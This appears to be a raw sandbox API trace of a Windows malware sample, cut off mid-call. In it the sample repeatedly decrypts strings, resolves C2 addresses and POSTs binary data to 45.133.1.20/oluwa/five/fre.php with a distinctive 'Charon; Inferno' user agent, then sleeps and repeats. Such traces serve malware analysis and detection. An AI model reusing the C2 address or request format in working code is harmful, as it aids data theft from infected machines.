[0183.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0183.239] GetProcessHeap () returned 0x6a0000 [0183.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0183.239] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10dc) returned 0x410 [0183.241] Sleep (dwMilliseconds=0xea60) [0183.243] GetProcessHeap () returned 0x6a0000 [0183.243] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0183.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.245] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0183.269] GetProcessHeap () returned 0x6a0000 [0183.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0183.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.270] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0183.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.274] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.275] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.275] GetProcessHeap () returned 0x6a0000 [0183.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0183.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.285] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0183.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.286] CryptDestroyKey (hKey=0x6ad020) returned 1 [0183.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.287] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0183.287] GetProcessHeap () returned 0x6a0000 [0183.287] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.288] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.289] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.290] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.293] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.293] GetProcessHeap () returned 0x6a0000 [0183.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0183.293] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.294] GetProcessHeap () returned 0x6a0000 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0183.294] GetProcessHeap () returned 0x6a0000 [0183.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.294] GetProcessHeap () returned 0x6a0000 [0183.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0183.297] GetProcessHeap () returned 0x6a0000 [0183.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0183.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.299] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0183.313] GetProcessHeap () returned 0x6a0000 [0183.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0183.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.315] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0183.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.319] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.320] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.320] GetProcessHeap () returned 0x6a0000 [0183.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0183.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.322] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0183.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.323] CryptDestroyKey (hKey=0x6ad560) returned 1 [0183.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.325] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0183.325] GetProcessHeap () returned 0x6a0000 [0183.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.326] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0183.327] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.330] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0183.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.331] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0183.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.333] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0183.333] GetProcessHeap () returned 0x6a0000 [0183.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0183.333] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0183.333] GetProcessHeap () returned 0x6a0000 [0183.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0183.333] socket (af=2, type=1, protocol=6) returned 0x414 [0183.336] connect (s=0x414, name=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0183.364] FreeAddrInfoW (pAddrInfo=0x6b9b40*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7f0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0183.364] GetProcessHeap () returned 0x6a0000 [0183.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0183.364] GetProcessHeap () returned 0x6a0000 [0183.364] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0183.365] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.366] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.366] GetProcessHeap () returned 0x6a0000 [0183.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0183.366] GetProcessHeap () returned 0x6a0000 [0183.367] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.367] GetProcessHeap () returned 0x6a0000 [0183.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0183.367] GetProcessHeap () returned 0x6a0000 [0183.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0183.368] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.369] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.369] GetProcessHeap () returned 0x6a0000 [0183.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0183.369] GetProcessHeap () returned 0x6a0000 [0183.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.370] send (s=0x414, buf=0x6bbd20*, len=242, flags=0) returned 242 [0183.373] send (s=0x414, buf=0x6bb998*, len=159, flags=0) returned 159 [0183.373] GetProcessHeap () returned 0x6a0000 [0183.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0183.373] recv (in: s=0x414, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0183.441] GetProcessHeap () returned 0x6a0000 [0183.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0183.442] GetProcessHeap () returned 0x6a0000 [0183.442] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0183.443] GetProcessHeap () returned 0x6a0000 [0183.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0183.443] GetProcessHeap () returned 0x6a0000 [0183.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0183.444] closesocket (s=0x414) returned 0 [0183.444] GetProcessHeap () returned 0x6a0000 [0183.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0183.445] GetProcessHeap () returned 0x6a0000 [0183.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.445] GetProcessHeap () returned 0x6a0000 [0183.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0183.445] GetProcessHeap () returned 0x6a0000 [0183.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0183.446] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10e0) returned 0x414 [0183.448] Sleep (dwMilliseconds=0xea60) [0183.451] GetProcessHeap () returned 0x6a0000 [0183.451] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0183.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.483] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0183.512] GetProcessHeap () returned 0x6a0000 [0183.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0183.513] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.514] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0183.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.517] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.519] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.519] GetProcessHeap () returned 0x6a0000 [0183.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0183.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.521] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0183.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.530] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0183.531] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.531] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0183.531] GetProcessHeap () returned 0x6a0000 [0183.532] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.533] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0183.533] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.534] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0183.534] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.535] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0183.535] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.536] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0183.536] GetProcessHeap () returned 0x6a0000 [0183.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0183.536] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0183.536] GetProcessHeap () returned 0x6a0000 [0183.537] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0183.537] GetProcessHeap () returned 0x6a0000 [0183.538] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.540] GetProcessHeap () returned 0x6a0000 [0183.541] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0183.541] GetProcessHeap () returned 0x6a0000 [0183.541] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0183.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.542] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0183.553] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.553] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0183.562] GetProcessHeap () returned 0x6a0000 [0183.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0183.563] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.563] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0183.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.564] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0183.565] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.565] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0183.565] GetProcessHeap () returned 0x6a0000 [0183.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0183.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.567] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0183.568] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.569] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0183.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.570] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0183.570] GetProcessHeap () returned 0x6a0000 [0183.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0183.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.574] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0183.575] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.575] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0183.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.576] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0183.577] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0183.577] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0183.578] GetProcessHeap () returned 0x6a0000 [0183.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0183.578] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b9a28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0183.578] GetProcessHeap () returned 0x6a0000 [0183.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0183.578] socket (af=2, type=1, protocol=6) returned 0x418 [0183.578] connect (s=0x418, name=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0183.607] FreeAddrInfoW (pAddrInfo=0x6b9a28*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9b8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0183.607] GetProcessHeap () returned 0x6a0000 [0183.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bed28 [0183.607] GetProcessHeap () returned 0x6a0000 [0183.607] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0183.608] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.609] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0183.609] GetProcessHeap () returned 0x6a0000 [0183.609] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0183.609] GetProcessHeap () returned 0x6a0000 [0183.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.629] GetProcessHeap () returned 0x6a0000 [0183.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0183.629] GetProcessHeap () returned 0x6a0000 [0183.629] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0183.630] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0183.631] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0183.631] GetProcessHeap () returned 0x6a0000 [0183.631] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0183.631] GetProcessHeap () returned 0x6a0000 [0183.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0183.632] send (s=0x418, buf=0x6bbd20*, len=242, flags=0) returned 242 [0183.632] send (s=0x418, buf=0x6bb998*, len=159, flags=0) returned 159 [0183.632] GetProcessHeap () returned 0x6a0000 [0183.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0183.632] recv (in: s=0x418, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0183.705] GetProcessHeap () returned 0x6a0000 [0183.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0183.707] GetProcessHeap () returned 0x6a0000 [0183.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0183.707] GetProcessHeap () returned 0x6a0000 [0183.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0183.707] GetProcessHeap () returned 0x6a0000 [0183.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bed28 | out: hHeap=0x6a0000) returned 1 [0183.708] closesocket (s=0x418) returned 0 [0183.709] GetProcessHeap () returned 0x6a0000 [0183.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0183.709] GetProcessHeap () returned 0x6a0000 [0183.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0183.709] GetProcessHeap () returned 0x6a0000 [0183.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0183.709] GetProcessHeap () returned 0x6a0000 [0183.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0183.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x10e4) returned 0x418 [0183.712] Sleep (dwMilliseconds=0xea60) [0183.713] GetProcessHeap () returned 0x6a0000 [0183.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0183.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0183.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: 